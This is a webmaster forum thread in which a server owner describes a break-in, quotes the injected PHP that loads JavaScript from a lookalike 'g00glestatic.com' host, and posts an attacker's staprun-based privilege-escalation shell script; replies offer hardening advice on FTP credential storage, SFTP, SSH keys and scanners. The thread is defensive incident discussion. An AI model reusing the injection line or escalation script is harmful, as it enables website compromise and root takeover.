Malware Infection

ii silver ii

ii silver ii

ǝɹıɟpǝʞɔı&
Dec 18, 2008
767
23
0
Didn't ever expect to post this but I guess someone/thing found an exploit to gain access to my server ...

Basically they uploaded a few files to the public_html and ran some bash commands to move those files to the /home/ directory of the users:



A couple of php files also had lines such as:

PHP: 
#9c282e#

if(!$srvc_counter) {
    echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";
$srvc_counter = true;}

#/9c282e#

Those files can be easily cleaned but there were four .session_121432 type files uploaded that contain either bash scripts or machine code, my question is can anyone decode these two attached files?

The one of those files that's not in machine language is:

PHP: 
#!/bin/sh
export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
export TERM=linux
echo -n "-> checking staprun: ";
if which staprun 2>&1 | grep -q "no $1";
then
  flag=1
elif [ -z "`which $1 2>&1`" ];
then
  flag=1;
fi
if [ "$flag" = "1" ];
then
  echo "no staprun, exiting"; exit;
else
  echo "found";
  echo "-> trying to exploit... ";
  printf "install uprobes /bin/sh" > ololo.conf;
  MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
  rm -f ololo.conf
fi

Would be nice to see what they ran!

The servers getting nuked and rebuilt later today so this will be all be gone soon.

Also any ideas on how they gained access to two users public_html folders? Neither accounts had anything like wordpress or vbulletin, mostly custom coded code, possibly a brute force?
 

Attachments

  • ZippedSessionFiles.zip
    9.1 KB · Views: 3


Do you use Filezilla for FTP? If so, it's easy for somebody to grab the plain text file that holds all your servers with usernames and passwords.
 
  • Like
Reactions: ii silver ii
I would check your computer for malware first. Use Combofix

You can use FZ portable or switch to something more secure, like CuteFTP

Also, if you have a Dedicated, reseller or virtual server hosting account, see if you can get ClamAV Scanner installed. It will scan your sites for potential malware.
 
  • Like
Reactions: ii silver ii
I use Filzilla with secure ftp, didn't realise that file was plain text ... is there no setting to encrypt it? Any decent alternatives with this feature?

Have Trend Micro Titanium running in the background and it's not noticed any trojans etc.

The only stupid mistake was not having hosts.allow setup with a static ip, that will be resolved on the rebuild though.

I run a dedicated so I'll check that software out, thanks!
 
Yeah, FileZilla stores it in an XML file. If you still want to use it I'd suggest doing what Brandon said or just move to another FTP client. Your other options are to not store the servers and usernames/passwords in FileZilla and use something like Keypass.

You can also add in an extra layer of security and run FZ portable on a virtual encrypted disk using TrueCrypt. Mount when you need to use and dismount when done. Pain in the ass but it could save a future headache.
 
ii silver ii said:
Would be nice to see what they ran!

The servers getting nuked and rebuilt later today so this will be all be gone soon.

Also any ideas on how they gained access to two users public_html folders? Neither accounts had anything like wordpress or vbulletin, mostly custom coded code, possibly a brute force?
Click to expand...


If your server doesn't have systemtap installed, that shell script won't do anything but exit. They are gathering information about your system and it's environment, and then attempting to cover their tracks. stap will probe devices and display things like current connections, etc.

They used sudo to run privileged commands, so you definitely need to not use that same password. Check your /var/log/auth.log and it should show which user the script was running under when it issued the sudo command .

Also, do you know if those user accts were legit users?
 
strategic said:
Is there a way to make FZ secure?

thanks
Click to expand...

You can encrypt all your filezilla network traffic by switching from ftp to sftp. Unencrypted traffic can easily have logins and passwords sniffed. And yes, ftp is unencrypted. sftp is what you want.

ii silver ii said:
I use Filzilla with secure ftp, didn't realise that file was plain text ...
Click to expand...

The user login/password database file itself resides on your desktop. In plaintext. However when filezilla uses that file to automatically log in to that site it does NOT transmit the user and pass unencrypted as long as you're using sftp. Everything about an sftp session is encrypted. Now if you were using plain old ftp then yeah, sniffable. But someone would need access to your workstation to steal those passwords. They cannot grab them otherwise.
 
extor said:
But someone would need access to your workstation to steal those passwords. They cannot grab them otherwise.
Click to expand...

This is exactly what they are talking about though. You get a virus on your machine and one of the key targets is your Filezilla logins and passwords file. It's happened to several WF members. It happened to me when I was using AVG simply by visiting an infected WordPress site, and 8 of my sites became infected. I've since switched to Kaspersky.

I also use Keepass now to store my logins and passwords and with it you can launch Filezilla by using this link where the URL goes in the entry and it will not store anything...

cmd://"C:\Program Files (x86)\FileZilla FTP Client\filezilla.exe" ftp://{USERNAME}:{PASSWORD}@{TITLE}
 
Plenty of flaws in PHP itself if that's what your using to inject code/scripts. I had to fix a wordpress site a few months ago by updating htaccess to protect against PHP issues.
 
lol - what kinda idiot leaves this on the infected machine

PHP: 
  echo "found";
  echo "-> trying to exploit... ";

anyhow - its good that you are looking into this, but don't forget a compromise like this could have happened from a number of different angles including the top layer down (WP/mysql injection) etc

or like some folks in here mentioned it could have been something from YOUR local side that infected your FTPs saved xml file.

really kinda scary to me - I didn't realize that a lot of these malware programs were targeting that specific file. scary!
 
Do not use ftp - do not use password - do not allow passwords.

Use only ssh keys and SCP/SFTP to login.

The first thing i do after i install a server (linux) is to setup ssh, the keys
and then i turn off password based login.

Then fail2ban and you are alot more secure.

The trick is here, that the majority of php hacks gives you only very limited access to the server system itself.
They need to enter your server direct at some point, that is why they
create users and get passwords. Only very broken php installations with
tons of security holes allows a full access hack through php and the web server only.

It is a bit more complex, but as said: With ssh key access only they can't get on your server even they get passwords.

Give your php install a basic check: PHP Security Consortium: PHPSecInfo

After that, you will be somewhat secured from the script kiddy hacker.
Real hackers using zero days bugs in windows or linux of the web
installation are a different thing, but you will not see that guys. They work
for the CIA or KGB or they hack some big banks. They have better to do as your server.
 
You must log in or register to reply here.
Top Bottom
Back